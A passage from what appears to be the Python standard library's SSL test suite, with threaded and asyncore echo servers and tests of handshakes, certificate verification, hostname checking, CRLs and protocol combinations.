ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except (ConnectionResetError, ConnectionAbortedError):
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except ssl.SSLError as err:
# On Windows sometimes test_pha_required_nocert receives the
# PEER_DID_NOT_RETURN_A_CERTIFICATE exception
# before the 'tlsv13 alert certificate required' exception.
# If the server is stopped when PEER_DID_NOT_RETURN_A_CERTIFICATE
# is received test_pha_required_nocert fails with ConnectionResetError
# because the underlying socket is closed
if 'PEER_DID_NOT_RETURN_A_CERTIFICATE' == err.reason:
if self.server.chatty and support.verbose:
sys.stdout.write(err.args[1])
# test_pha_required_nocert is expecting this exception
raise ssl.SSLError('tlsv13 alert certificate required')
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
